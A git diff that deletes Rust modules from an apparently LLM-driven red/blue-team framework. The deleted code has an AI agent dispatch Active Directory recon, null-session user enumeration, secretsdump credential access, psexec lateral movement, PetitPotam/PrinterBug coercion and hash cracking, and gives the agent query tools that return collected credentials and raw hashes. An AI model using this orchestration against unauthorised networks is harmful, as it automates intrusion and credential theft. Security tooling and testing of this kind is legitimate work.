-//! - [`BlueToolDispatcher`] — wraps the red-team dispatcher and routes blue
-//!   tool names to `ares_tools::blue::dispatch_blue()` for local execution.
-//! - [`SubAgentCallbackHandler`] — minimal callback handler for blue
-//!   sub-agents that handles lifecycle completion tools and tracks token usage.
-
-use std::sync::Arc;
-
-use anyhow::Result;
-use tracing::{debug, warn};
-
-use ares_llm::agent_loop::CallbackResult;
-use ares_llm::{CallbackHandler, TokenUsage, ToolCall, ToolDispatcher, ToolExecResult};
-
-use super::callbacks::BlueCallbackHandler;
-
-// ---------------------------------------------------------------------------
-// Blue-aware tool dispatcher wrapper
-// ---------------------------------------------------------------------------
-
-/// Timeout for individual blue tool executions (e.g. Loki/Grafana queries).
-/// `execute_parallel_queries` runs up to 5 queries (2 concurrent), each with
-/// a 90s HTTP timeout and up to 2 retries — worst-case ~540s. Give headroom.
-const BLUE_TOOL_TIMEOUT_SECS: u64 = 600;
-
-/// Wraps an existing (red-team) dispatcher and intercepts blue tool names,
-/// routing them to `ares_tools::blue::dispatch_blue()` for local execution.
-/// Non-blue tools fall through to the inner dispatcher.
-pub(super) struct BlueToolDispatcher {
-    pub(super) inner: Arc<dyn ToolDispatcher>,
-}
-
-#[async_trait::async_trait]
-impl ToolDispatcher for BlueToolDispatcher {
-    async fn dispatch_tool(
-        &self,
-        role: &str,
-        task_id: &str,
-        call: &ToolCall,
-    ) -> Result<ToolExecResult> {
-        if ares_tools::blue::is_blue_tool(&call.name) {
-            debug!(tool = %call.name, "Executing blue tool locally");
-            match tokio::time::timeout(
-                std::time::Duration::from_secs(BLUE_TOOL_TIMEOUT_SECS),
-                ares_tools::blue::dispatch_blue(&call.name, &call.arguments),
-            )
-            .await
-            {
-                Ok(Ok(output)) => Ok(ToolExecResult {
-                    output: output.combined(),
-                    error: if output.success {
-                        None
-                    } else {
-                        Some(format!("tool exited with code {:?}", output.exit_code))
-                    },
-                    discoveries: None,
-                }),
-                Ok(Err(e)) => Ok(ToolExecResult {
-                    output: String::new(),
-                    error: Some(e.to_string()),
-                    discoveries: None,
-                }),
-                Err(_elapsed) => {
-                    warn!(
-                        tool = %call.name,
-                        timeout_secs = BLUE_TOOL_TIMEOUT_SECS,
-                        "Blue tool execution timed out"
-                    );
-                    Ok(ToolExecResult {
-                        output: format!(
-                            "Tool execution timed out after {BLUE_TOOL_TIMEOUT_SECS}s. \
-                             The data source may be unreachable. Try a simpler query or skip this step."
-                        ),
-                        error: Some("timeout".to_string()),
-                        discoveries: None,
-                    })
-                }
-            }
-        } else {
-            self.inner.dispatch_tool(role, task_id, call).await
-        }
-    }
-}
-
-// ---------------------------------------------------------------------------
-// Sub-agent callback handler (lifecycle callbacks only)
-// ---------------------------------------------------------------------------
-
-/// Minimal callback handler for blue sub-agents (triage, threat_hunter, etc.).
-///
-/// Recognizes lifecycle completion tools (`triage_complete`, `hunt_complete`,
-/// `lateral_complete`, etc.) so they end the sub-agent loop with `TaskComplete`
-/// instead of falling through to the Redis dispatcher.
-///
-/// Also tracks token usage per-investigation so blue team cost is visible.
-pub(super) struct SubAgentCallbackHandler {
-    pub(super) investigation_id: String,
-    pub(super) redis_url: String,
-}
-
-#[async_trait::async_trait]
-impl CallbackHandler for SubAgentCallbackHandler {
-    fn is_callback(&self, tool_name: &str) -> bool {
-        matches!(
-            tool_name,
-            "triage_complete"
-                | "hunt_complete"
-                | "lateral_complete"
-                | "complete_investigation"
-                | "confirm_escalation"
-                | "downgrade_escalation"
-                | "request_reinvestigation"
-                | "route_to_team"
-        )
-    }
-
-    async fn handle_callback(&self, call: &ToolCall) -> Option<Result<CallbackResult>> {
-        BlueCallbackHandler::handle_lifecycle_callback(call).map(Ok)
-    }
-
-    async fn on_token_usage(&self, usage: &TokenUsage, model: &str) {
-        if usage.input_tokens == 0 && usage.output_tokens == 0 {
-            return;
-        }
-        if let Ok(client) = redis::Client::open(self.redis_url.as_str()) {
-            if let Ok(mut conn) = client.get_connection_manager().await {
-                if let Err(e) = ares_core::token_usage::increment_blue_token_usage(
-                    &mut conn,
-                    &self.investigation_id,
-                    usage.input_tokens.into(),
-                    usage.output_tokens.into(),
-                    model,
-                )
-                .await
-                {
-                    warn!(err = %e, "Failed to record blue sub-agent token usage");
-                }
-            }
-        }
-    }
-}
diff --git a/ares-orchestrator/src/bootstrap.rs b/ares-orchestrator/src/bootstrap.rs
deleted file mode 100644
index fb389625..00000000
--- a/ares-orchestrator/src/bootstrap.rs
+++ /dev/null
@@ -1,164 +0,0 @@
-use std::sync::Arc;
-
-use anyhow::Result;
-use redis::AsyncCommands;
-use tracing::{info, warn};
-
-use crate::config::OrchestratorConfig;
-use crate::dispatcher::Dispatcher;
-use crate::task_queue::TaskQueue;
-
-/// Probe target IPs on port 88 (Kerberos) then 389 (LDAP) to find a real DC.
-/// Returns the first IP that accepts a TCP connection within 500ms.
-pub(crate) async fn probe_dc_port(ips: &[String]) -> Option<String> {
-    for port in [88u16, 389] {
-        for ip in ips {
-            let addr = format!("{ip}:{port}");
-            if let Ok(Ok(_)) = tokio::time::timeout(
-                std::time::Duration::from_millis(500),
-                tokio::net::TcpStream::connect(&addr),
-            )
-            .await
-            {
-                info!(ip = %ip, port = port, "DC probe: port open");
-                return Some(ip.clone());
-            }
-        }
-    }
-    None
-}
-
-/// Write initial operation metadata to Redis so workers can discover the operation.
-///
-/// Mirrors the Python `_initialize_state_and_persist()` in `_orchestrator.py`.
-pub(crate) async fn bootstrap_meta(queue: &TaskQueue, config: &OrchestratorConfig) -> Result<()> {
-    use chrono::Utc;
-
-    let mut conn = queue.connection();
-    let meta_key = format!(
-        "{}:{}:{}",
-        ares_core::state::KEY_PREFIX,
-        config.operation_id,
-        "meta"
-    );
-
-    let now = Utc::now().to_rfc3339();
-
-    // started_at must only be set once — use HSETNX so restarts/recoveries
-    // don't overwrite the original start time (which would break runtime calc).
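Aside (reviewer note, not part of the patch): the HSETNX guard that follows is the whole restart-idempotency story for `started_at`. A minimal sketch of the property, assuming a local Redis at `127.0.0.1:6379` plus the `redis` crate (tokio connection-manager features) and `tokio`; key and field names are illustrative:

```rust
use redis::AsyncCommands;

#[tokio::main]
async fn main() -> redis::RedisResult<()> {
    let client = redis::Client::open("redis://127.0.0.1:6379/0")?;
    let mut conn = client.get_connection_manager().await?;
    let _: () = conn.del("demo:meta").await?;

    // First writer wins...
    let first: bool = conn.hset_nx("demo:meta", "started_at", "t0").await?;
    // ...and a simulated restart is a no-op: the original value survives.
    let second: bool = conn.hset_nx("demo:meta", "started_at", "t1").await?;
    let value: String = conn.hget("demo:meta", "started_at").await?;

    assert!(first && !second && value == "t0");
    Ok(())
}
```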
- let started_at_json = serde_json::to_string(&now).unwrap_or_default(); - let _: bool = conn - .hset_nx(&meta_key, "started_at", &started_at_json) - .await?; - - // Remaining fields are safe to overwrite on restart - let fields: Vec<(&str, String)> = vec![ - ("initialized", "true".to_string()), - ( - "target_domain", - serde_json::to_string(&config.target_domain).unwrap_or_default(), - ), - ( - "target_ip", - serde_json::to_string(config.target_ips.first().unwrap_or(&String::new())) - .unwrap_or_default(), - ), - ( - "target_ips", - serde_json::to_string(&config.target_ips.join(",")).unwrap_or_default(), - ), - ]; - - for (field, value) in &fields { - let _: () = conn.hset(&meta_key, *field, value).await?; - } - // 24h TTL - let _: () = conn.expire(&meta_key, 86400).await?; - - // Set active operation pointer for worker discovery - let _: () = conn.set("ares:op:active", &config.operation_id).await?; - - // Write operation status key (matches Python's status tracking) - ares_core::state::set_operation_status(&mut conn, &config.operation_id, "running").await?; - - // Store the LLM model name for worker discovery and recovery - let model_key = format!( - "{}:{}:{}", - ares_core::state::KEY_PREFIX, - config.operation_id, - ares_core::state::KEY_MODEL, - ); - let model_name = std::env::var("ARES_LLM_MODEL").unwrap_or_default(); - if !model_name.is_empty() { - let _: () = conn.set_ex(&model_key, &model_name, 86400u64).await?; - } - - info!( - operation_id = %config.operation_id, - meta_key = %meta_key, - "Operation metadata written to Redis" - ); - Ok(()) -} - -/// Dispatch initial recon tasks for each target IP. -/// -/// This seeds the reactive automation pipeline — without these initial tasks, -/// all automation tasks have nothing to work with on a fresh operation. -pub(crate) async fn dispatch_initial_recon( - dispatcher: &Arc, - config: &OrchestratorConfig, -) -> usize { - let mut count = 0; - let domain = &config.target_domain; - - // Network scan + SMB sweep + SMB signing check per target IP. - // smb_sweep (NetExec) is critical: it discovers hostnames, OS, and DCs - // from SMB banners — data that nmap alone may miss. - for ip in &config.target_ips { - match dispatcher - .request_recon( - ip, - domain, - &["network_scan", "smb_sweep", "smb_signing_check"], - None, - ) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, ip = %ip, "Dispatched initial recon"); - count += 1; - } - Ok(None) => { - warn!(ip = %ip, "Initial recon throttled/deferred"); - } - Err(e) => { - warn!(ip = %ip, err = %e, "Failed to dispatch initial recon"); - } - } - } - - // User enumeration against all target IPs — we don't know which are DCs yet, - // and non-DC IPs may silently return no output. Null session for bootstrap. 
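Aside (reviewer note, not part of the patch): both seeding loops in this function branch on the same three-way dispatch outcome, which is worth stating once: `Ok(Some(id))` means submitted, `Ok(None)` means throttled/deferred, and `Err` means failure. A stand-alone restatement with simplified types (this is not the real `Dispatcher` API):

```rust
fn describe(outcome: Result<Option<String>, String>) -> String {
    match outcome {
        Ok(Some(task_id)) => format!("dispatched as {task_id}"),
        Ok(None) => "throttled/deferred".to_string(), // logged as a warn, not an error
        Err(e) => format!("failed: {e}"),
    }
}

fn main() {
    assert_eq!(describe(Ok(Some("t-1".into()))), "dispatched as t-1");
    assert_eq!(describe(Ok(None)), "throttled/deferred");
    assert_eq!(describe(Err("redis down".into())), "failed: redis down");
}
```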
- for ip in &config.target_ips { - let payload = serde_json::json!({ - "target_ip": ip, - "domain": domain, - "techniques": ["user_enumeration"], - "null_session": true, - }); - match dispatcher - .throttled_submit("recon", "recon", payload, 5) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, ip = %ip, "Dispatched user enumeration"); - count += 1; - } - Ok(None) => warn!(ip = %ip, "User enumeration throttled/deferred"), - Err(e) => warn!(ip = %ip, err = %e, "Failed to dispatch user enumeration"), - } - } - - count -} diff --git a/ares-orchestrator/src/callback_handler/dispatch.rs b/ares-orchestrator/src/callback_handler/dispatch.rs deleted file mode 100644 index 5384e179..00000000 --- a/ares-orchestrator/src/callback_handler/dispatch.rs +++ /dev/null @@ -1,251 +0,0 @@ -//! Dispatch tools — submit sub-tasks via the Dispatcher, and disabled record tools. - -use anyhow::Result; -use tracing::{info, warn}; - -use ares_llm::provider::ToolCall; -use ares_llm::CallbackResult; - -use super::OrchestratorCallbackHandler; - -impl OrchestratorCallbackHandler { - pub(super) async fn dispatch_recon(&self, call: &ToolCall) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); - let domain = call.arguments["domain"].as_str().unwrap_or(""); - let techniques: Vec<&str> = call.arguments["techniques"] - .as_array() - .map(|arr| arr.iter().filter_map(|v| v.as_str()).collect()) - .unwrap_or_default(); - - let task_id = dispatcher - .request_recon(target_ip, domain, &techniques, None) - .await?; - - info!(target_ip = target_ip, "Dispatched recon task"); - Ok(CallbackResult::Continue(format!( - "Recon task dispatched: {}", - task_id.as_deref().unwrap_or("queued") - ))) - } - - pub(super) async fn dispatch_credential_access( - &self, - call: &ToolCall, - ) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let technique = call.arguments["technique"] - .as_str() - .unwrap_or("secretsdump"); - let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); - let domain = call.arguments["domain"].as_str().unwrap_or(""); - let username = call.arguments["username"].as_str().unwrap_or(""); - let password = call.arguments["password"].as_str().unwrap_or(""); - let priority = call.arguments["priority"].as_i64().unwrap_or(5) as i32; - - let cred = ares_core::models::Credential { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - password: password.to_string(), - domain: domain.to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }; - - let task_id = dispatcher - .request_credential_access(technique, target_ip, domain, &cred, priority) - .await?; - - info!( - technique = technique, - target_ip = target_ip, - "Dispatched credential access task" - ); - Ok(CallbackResult::Continue(format!( - "Credential access task ({technique}) dispatched: {}", - task_id.as_deref().unwrap_or("queued") - ))) - } - - pub(super) async fn dispatch_lateral(&self, call: &ToolCall) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); - let technique = call.arguments["technique"].as_str().unwrap_or("psexec"); - let username = call.arguments["username"].as_str().unwrap_or(""); - 
let password = call.arguments["password"].as_str().unwrap_or(""); - let domain = call.arguments["domain"].as_str().unwrap_or(""); - - let cred = ares_core::models::Credential { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - password: password.to_string(), - domain: domain.to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }; - - let task_id = dispatcher - .request_lateral(target_ip, &cred, technique) - .await?; - - info!( - technique = technique, - target_ip = target_ip, - "Dispatched lateral movement task" - ); - Ok(CallbackResult::Continue(format!( - "Lateral movement ({technique}) dispatched to {target_ip}: {}", - task_id.as_deref().unwrap_or("queued") - ))) - } - - pub(super) async fn dispatch_exploit(&self, call: &ToolCall) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let vuln_id = call.arguments["vuln_id"].as_str().unwrap_or(""); - let priority = call.arguments["priority"].as_i64().unwrap_or(3) as i32; - - // Look up vulnerability in state - let state = self.state.read().await; - let vuln = state.discovered_vulnerabilities.get(vuln_id); - - if let Some(vuln) = vuln { - let vuln = vuln.clone(); - drop(state); // Release lock before async dispatch - - let task_id = dispatcher.request_exploit(&vuln, priority).await?; - info!(vuln_id = vuln_id, "Dispatched exploit task"); - Ok(CallbackResult::Continue(format!( - "Exploit task for {} dispatched: {}", - vuln_id, - task_id.as_deref().unwrap_or("queued") - ))) - } else { - drop(state); - Ok(CallbackResult::Continue(format!( - "Vulnerability {vuln_id} not found in discovered vulnerabilities" - ))) - } - } - - pub(super) async fn dispatch_coercion(&self, call: &ToolCall) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); - let listener_ip = call.arguments["listener_ip"].as_str().unwrap_or(""); - let techniques: Vec<&str> = call.arguments["techniques"] - .as_array() - .map(|arr| arr.iter().filter_map(|v| v.as_str()).collect()) - .unwrap_or_else(|| vec!["petitpotam", "printerbug"]); - - let task_id = dispatcher - .request_coercion(target_ip, listener_ip, &techniques) - .await?; - - info!(target_ip = target_ip, "Dispatched coercion task"); - Ok(CallbackResult::Continue(format!( - "Coercion task dispatched to {target_ip}: {}", - task_id.as_deref().unwrap_or("queued") - ))) - } - - /// record_credential is disabled — credentials come only from tool output parsing. - /// This handler exists as a safety net in case the LLM somehow invokes it. - pub(super) async fn record_credential(&self, _call: &ToolCall) -> Result { - warn!("record_credential called but disabled — credentials are auto-extracted from tool output"); - Ok(CallbackResult::Continue( - "This tool is disabled. Credentials are automatically extracted from tool output. \ - Focus on running tools that produce credential data (secretsdump, lsassy, netexec, etc.) \ - and the system will parse and store credentials automatically." - .to_string(), - )) - } - - /// record_timeline_event is disabled — timeline events are auto-generated from - /// state changes (credential/hash/host discoveries) in result_processing.rs. - /// This handler exists as a safety net in case the LLM somehow invokes it. 
- pub(super) async fn record_timeline_event(&self, _call: &ToolCall) -> Result { - warn!("record_timeline_event called but disabled — timeline events are auto-generated from discoveries"); - Ok(CallbackResult::Continue( - "This tool is disabled. Timeline events are automatically generated when \ - credentials, hashes, and hosts are discovered from tool output. Focus on \ - running attack tools and the system will build the timeline automatically." - .to_string(), - )) - } - - pub(super) async fn dispatch_crack(&self, call: &ToolCall) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let hash_value = call.arguments["hash_value"].as_str().unwrap_or(""); - let hash_type = call.arguments["hash_type"].as_str().unwrap_or("ntlm"); - let username = call.arguments["username"].as_str().unwrap_or(""); - let domain = call.arguments["domain"].as_str().unwrap_or(""); - - let hash = ares_core::models::Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value: hash_value.to_string(), - hash_type: hash_type.to_string(), - domain: domain.to_string(), - cracked_password: None, - source: String::new(), - discovered_at: None, - parent_id: None, - attack_step: 0, - aes_key: None, - }; - - let task_id = dispatcher.request_crack(&hash).await?; - - info!(hash_type = hash_type, "Dispatched crack task"); - Ok(CallbackResult::Continue(format!( - "Crack task dispatched for {username}@{domain} ({hash_type}): {}", - task_id.as_deref().unwrap_or("queued") - ))) - } - - /// report_cracked_credential is disabled — cracked passwords are extracted from - /// hashcat/john stdout via output_extraction.rs parsers. LLMs must never construct - /// credential data directly. - /// This handler exists as a safety net in case the LLM somehow invokes it. - pub(super) async fn report_cracked_credential( - &self, - _call: &ToolCall, - ) -> Result { - warn!("report_cracked_credential called but disabled — cracked passwords are auto-extracted from tool output"); - Ok(CallbackResult::Continue( - "This tool is disabled. Cracked passwords are automatically extracted from \ - hashcat and john output. Run the cracking tools and the system will parse \ - and store cracked credentials automatically." - .to_string(), - )) - } -} diff --git a/ares-orchestrator/src/callback_handler/mod.rs b/ares-orchestrator/src/callback_handler/mod.rs deleted file mode 100644 index de02f2c2..00000000 --- a/ares-orchestrator/src/callback_handler/mod.rs +++ /dev/null @@ -1,111 +0,0 @@ -//! Orchestrator-specific callback handler for state query and dispatch tools. -//! -//! Implements `CallbackHandler` to handle tools that need in-memory state access: -//! -//! **Query tools** — read from SharedState (credentials, hashes, tasks, agent status) -//! **Dispatch tools** — submit sub-tasks via the Dispatcher (recon, credential_access, etc.) -//! -//! These tools are available only to the orchestrator agent role. - -mod dispatch; -mod query; -#[cfg(test)] -mod tests; - -use std::sync::Arc; - -use anyhow::Result; -use tracing::warn; - -use ares_llm::provider::ToolCall; -use ares_llm::{CallbackHandler, CallbackResult}; - -use crate::dispatcher::Dispatcher; -use crate::state::SharedState; -use crate::task_queue::TaskQueue; - -/// Callback handler for orchestrator LLM agent tools. -/// -/// Provides direct access to shared state (for query tools) and the dispatcher -/// (for sub-task submission) without going through Redis tool queues. 
-pub struct OrchestratorCallbackHandler {
-    pub(super) state: SharedState,
-    pub(super) dispatcher: Option<Arc<Dispatcher>>,
-    pub(super) task_queue: Option<TaskQueue>,
-}
-
-impl OrchestratorCallbackHandler {
-    pub fn new(state: SharedState, task_queue: TaskQueue) -> Self {
-        Self {
-            state,
-            dispatcher: None,
-            task_queue: Some(task_queue),
-        }
-    }
-
-    #[cfg(test)]
-    pub fn new_for_test(state: SharedState) -> Self {
-        Self {
-            state,
-            dispatcher: None,
-            task_queue: None,
-        }
-    }
-
-    pub fn with_dispatcher(mut self, dispatcher: Arc<Dispatcher>) -> Self {
-        self.dispatcher = Some(dispatcher);
-        self
-    }
-}
-
-#[async_trait::async_trait]
-impl CallbackHandler for OrchestratorCallbackHandler {
-    async fn handle_callback(&self, call: &ToolCall) -> Option<Result<CallbackResult>> {
-        match call.name.as_str() {
-            // Query tools
-            "get_credential_summary" => Some(self.get_credential_summary().await),
-            "get_hash_summary" => Some(self.get_hash_summary().await),
-            "get_all_credentials" => Some(self.get_all_credentials(call).await),
-            "get_all_hashes" => Some(self.get_all_hashes(call).await),
-            "get_hash_value" => Some(self.get_hash_value(call).await),
-            "get_pending_tasks" => Some(self.get_pending_tasks().await),
-            "get_agent_status" => Some(self.get_agent_status().await),
-            "get_operation_summary" => Some(self.get_operation_summary().await),
-            // Recording tools — disabled; handlers return guidance only (see dispatch.rs)
-            "record_credential" => Some(self.record_credential(call).await),
-            "record_timeline_event" => Some(self.record_timeline_event(call).await),
-            // Dispatch tools
-            "dispatch_recon" => Some(self.dispatch_recon(call).await),
-            "dispatch_credential_access" => Some(self.dispatch_credential_access(call).await),
-            "dispatch_lateral_movement" => Some(self.dispatch_lateral(call).await),
-            "dispatch_privesc_exploit" => Some(self.dispatch_exploit(call).await),
-            "dispatch_coercion" => Some(self.dispatch_coercion(call).await),
-            "dispatch_crack" => Some(self.dispatch_crack(call).await),
-            // Cracker result — disabled; cracked passwords are auto-extracted (see dispatch.rs)
-            "report_cracked_credential" => Some(self.report_cracked_credential(call).await),
-            // Not ours — let built-in handler take over
-            _ => None,
-        }
-    }
-
-    async fn on_token_usage(&self, usage: &ares_llm::TokenUsage, model: &str) {
-        if usage.input_tokens == 0 && usage.output_tokens == 0 {
-            return;
-        }
-        if let Some(ref queue) = self.task_queue {
-            let op_id = self.state.read().await.operation_id.clone();
-            let mut conn = queue.connection();
-            if let Err(e) = ares_core::token_usage::increment_token_usage(
-                &mut conn,
-                &op_id,
-                usage.input_tokens.into(),
-                usage.output_tokens.into(),
-                model,
-            )
-            .await
-            {
-                warn!(err = %e, "Failed to record incremental token usage");
-            }
-        }
-    }
-}
diff --git a/ares-orchestrator/src/callback_handler/query.rs b/ares-orchestrator/src/callback_handler/query.rs
deleted file mode 100644
index acd83112..00000000
--- a/ares-orchestrator/src/callback_handler/query.rs
+++ /dev/null
@@ -1,318 +0,0 @@
-//! Query tools — read from in-memory state.
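Aside (reviewer note, not part of the patch): the `Option<Result<CallbackResult>>` contract above is load-bearing: `None` means "not my tool", which is how non-callback tools still fall through to the built-in Redis dispatcher. A minimal stand-in with simplified types (not the real `ares_llm` API):

```rust
// Simplified stand-ins for ares_llm::CallbackResult and anyhow::Result.
#[derive(Debug)]
enum CallbackResult {
    Continue(String),
}

fn handle_callback(tool: &str) -> Option<Result<CallbackResult, String>> {
    match tool {
        "get_pending_tasks" => Some(Ok(CallbackResult::Continue("{\"total\":0}".into()))),
        _ => None, // unknown tools fall through to the built-in handler
    }
}

fn main() {
    assert!(handle_callback("nmap_scan").is_none()); // falls through
    assert!(matches!(handle_callback("get_pending_tasks"), Some(Ok(_))));
}
```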
- -use std::collections::HashMap; - -use anyhow::Result; -use serde_json::json; - -use ares_llm::provider::ToolCall; -use ares_llm::CallbackResult; - -use super::OrchestratorCallbackHandler; - -impl OrchestratorCallbackHandler { - pub(super) async fn get_credential_summary(&self) -> Result { - let state = self.state.read().await; - let mut by_domain: HashMap<&str, (usize, usize)> = HashMap::new(); - - for cred in &state.credentials { - let domain = if cred.domain.is_empty() { - "unknown" - } else { - &cred.domain - }; - let entry = by_domain.entry(domain).or_insert((0, 0)); - entry.0 += 1; - if cred.is_admin { - entry.1 += 1; - } - } - - let summary: Vec = by_domain - .iter() - .map(|(domain, (total, admin))| { - json!({ - "domain": domain, - "total": total, - "admin": admin, - }) - }) - .collect(); - - let result = json!({ - "total_credentials": state.credentials.len(), - "by_domain": summary, - "has_domain_admin": state.has_domain_admin, - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_hash_summary(&self) -> Result { - let state = self.state.read().await; - let mut by_type: HashMap<&str, (usize, usize)> = HashMap::new(); - - for hash in &state.hashes { - let entry = by_type.entry(&hash.hash_type).or_insert((0, 0)); - entry.0 += 1; - if hash.cracked_password.is_some() { - entry.1 += 1; - } - } - - let summary: Vec = by_type - .iter() - .map(|(hash_type, (total, cracked))| { - json!({ - "hash_type": hash_type, - "total": total, - "cracked": cracked, - "uncracked": total - cracked, - }) - }) - .collect(); - - let result = json!({ - "total_hashes": state.hashes.len(), - "by_type": summary, - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_all_credentials(&self, call: &ToolCall) -> Result { - let limit = call.arguments["limit"].as_u64().unwrap_or(30) as usize; - let offset = call.arguments["offset"].as_u64().unwrap_or(0) as usize; - - let state = self.state.read().await; - let total = state.credentials.len(); - let page: Vec = state - .credentials - .iter() - .skip(offset) - .take(limit) - .map(|c| { - json!({ - "username": c.username, - "domain": c.domain, - "has_password": !c.password.is_empty(), - "is_admin": c.is_admin, - "source": c.source, - }) - }) - .collect(); - - let result = json!({ - "credentials": page, - "total": total, - "offset": offset, - "limit": limit, - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_all_hashes(&self, call: &ToolCall) -> Result { - let limit = call.arguments["limit"].as_u64().unwrap_or(30) as usize; - let offset = call.arguments["offset"].as_u64().unwrap_or(0) as usize; - - let state = self.state.read().await; - let total = state.hashes.len(); - let page: Vec = state - .hashes - .iter() - .skip(offset) - .take(limit) - .map(|h| { - json!({ - "username": h.username, - "domain": h.domain, - "hash_type": h.hash_type, - "cracked": h.cracked_password.is_some(), - "source": h.source, - // Don't expose raw hash value to LLM — it doesn't need it - "has_aes_key": h.aes_key.is_some(), - }) - }) - .collect(); - - let result = json!({ - "hashes": page, - "total": total, - "offset": offset, - "limit": limit, - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_hash_value(&self, call: &ToolCall) -> Result { - let username = call.arguments["username"].as_str().unwrap_or(""); - let domain = 
call.arguments["domain"].as_str().unwrap_or(""); - let hash_type_filter = call.arguments["hash_type"].as_str(); - - let state = self.state.read().await; - let matches: Vec = state - .hashes - .iter() - .filter(|h| { - h.username.eq_ignore_ascii_case(username) - && (domain.is_empty() || h.domain.eq_ignore_ascii_case(domain)) - && hash_type_filter - .map(|t| h.hash_type.eq_ignore_ascii_case(t)) - .unwrap_or(true) - }) - .map(|h| { - let mut entry = json!({ - "username": h.username, - "domain": h.domain, - "hash_type": h.hash_type, - "hash_value": h.hash_value, - "cracked": h.cracked_password.is_some(), - }); - if let Some(ref aes) = h.aes_key { - entry["aes_key"] = json!(aes); - } - entry - }) - .collect(); - - if matches.is_empty() { - Ok(CallbackResult::Continue(format!( - "No hashes found for {username}@{domain}" - ))) - } else { - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &matches, - )?)) - } - } - - pub(super) async fn get_pending_tasks(&self) -> Result { - let state = self.state.read().await; - let tasks: Vec = state - .pending_tasks - .values() - .map(|t| { - json!({ - "task_id": t.task_id, - "task_type": t.task_type, - "assigned_agent": t.assigned_agent, - "status": format!("{:?}", t.status), - "created_at": t.created_at.to_rfc3339(), - }) - }) - .collect(); - - let result = json!({ - "pending_tasks": tasks, - "total": tasks.len(), - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_agent_status(&self) -> Result { - let task_queue = self - .task_queue - .as_ref() - .ok_or_else(|| anyhow::anyhow!("TaskQueue not configured"))?; - // Read heartbeats from Redis to get agent status (SCAN to avoid blocking) - let mut conn = task_queue.connection(); - let pattern = "ares:heartbeat:*"; - let keys = { - let mut all_keys = Vec::new(); - let mut cursor: u64 = 0; - loop { - let result: Result<(u64, Vec), redis::RedisError> = redis::cmd("SCAN") - .arg(cursor) - .arg("MATCH") - .arg(pattern) - .arg("COUNT") - .arg(100) - .query_async(&mut conn) - .await; - match result { - Ok((next_cursor, keys)) => { - all_keys.extend(keys); - cursor = next_cursor; - if cursor == 0 { - break; - } - } - Err(_) => break, - } - } - all_keys - }; - - let mut agents: Vec = Vec::new(); - for key in &keys { - if let Ok(data) = redis::cmd("GET") - .arg(key) - .query_async::(&mut conn) - .await - { - if let Ok(parsed) = serde_json::from_str::(&data) { - agents.push(parsed); - } - } - } - - let result = json!({ - "agents": agents, - "total": agents.len(), - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_operation_summary(&self) -> Result { - let state = self.state.read().await; - - let cracked_count = state - .hashes - .iter() - .filter(|h| h.cracked_password.is_some()) - .count(); - let admin_count = state.credentials.iter().filter(|c| c.is_admin).count(); - - let result = json!({ - "operation_id": state.operation_id, - "target_ips": state.target_ips, - "domains": state.domains, - "has_domain_admin": state.has_domain_admin, - "credentials": { - "total": state.credentials.len(), - "admin": admin_count, - }, - "hashes": { - "total": state.hashes.len(), - "cracked": cracked_count, - "uncracked": state.hashes.len() - cracked_count, - }, - "hosts": state.hosts.len(), - "users": state.users.len(), - "discovered_vulnerabilities": state.discovered_vulnerabilities.len(), - "exploited_vulnerabilities": state.exploited_vulnerabilities.len(), - "pending_tasks": 
state.pending_tasks.len(), - "completed_tasks": state.completed_tasks.len(), - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } -} diff --git a/ares-orchestrator/src/callback_handler/tests.rs b/ares-orchestrator/src/callback_handler/tests.rs deleted file mode 100644 index 5c410d1a..00000000 --- a/ares-orchestrator/src/callback_handler/tests.rs +++ /dev/null @@ -1,547 +0,0 @@ -use super::*; -use serde_json::json; - -use ares_llm::provider::ToolCall; -use ares_llm::CallbackResult; - -use crate::state::SharedState; - -/// Helper to create a credential without Default. -fn make_cred( - username: &str, - password: &str, - domain: &str, - is_admin: bool, -) -> ares_core::models::Credential { - ares_core::models::Credential { - id: uuid::Uuid::new_v4().to_string(), - username: username.into(), - password: password.into(), - domain: domain.into(), - source: String::new(), - discovered_at: None, - is_admin, - parent_id: None, - attack_step: 0, - } -} - -/// Helper to create a hash without Default. -fn make_hash( - username: &str, - domain: &str, - hash_type: &str, - hash_value: &str, - aes_key: Option<&str>, -) -> ares_core::models::Hash { - ares_core::models::Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.into(), - hash_value: hash_value.into(), - hash_type: hash_type.into(), - domain: domain.into(), - cracked_password: 